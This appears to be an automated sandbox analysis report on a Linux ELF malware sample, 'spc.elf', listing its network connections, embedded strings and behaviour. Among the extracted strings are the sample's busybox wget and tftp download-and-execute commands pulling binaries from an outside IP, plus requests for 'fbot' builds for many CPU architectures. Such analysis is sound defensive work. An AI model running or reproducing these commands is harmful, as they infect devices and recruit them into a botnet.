Source: spc.elf |
ReversingLabs: Detection: 39% |
Source: global traffic |
TCP traffic: 192.168.2.23:45598 -> 85.239.34.134:7685 |
Source: global traffic |
TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: spc.elf |
String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube) |
Source: spc.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube) |
Source: spc.elf |
String found in binary or memory: http://87.120.116.226 |
Source: spc.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY |
Source: spc.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox TSUNAMI |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox cat /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo |
Source: Initial sample |
String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x/tmp//var//var/run//dev/arm5arm72bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http:// |
Source: Initial sample |
String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox tftp -r |
Source: Initial sample |
String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -en ' |
Source: Initial sample |
String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45' |
Source: Initial sample |
String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t |
Source: Initial sample |
Potential command found: GET /fbot.arm5 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.arm7 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.x86 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.mips HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.mipsel HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.powerpc HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.sparc HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.sh4 HTTP/1.0 |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal48.linELF@0/0@0/0 |
Source: /usr/bin/dash (PID: 6222) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6 |
Jump to behavior |
Source: /usr/bin/dash (PID: 6223) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6 |
Jump to behavior |
Source: /tmp/spc.elf (PID: 6237) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/sparc |
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp |
Binary or memory string: U!/etc/qemu-binfmt/sparc |
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/spc.elf |
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-sparc |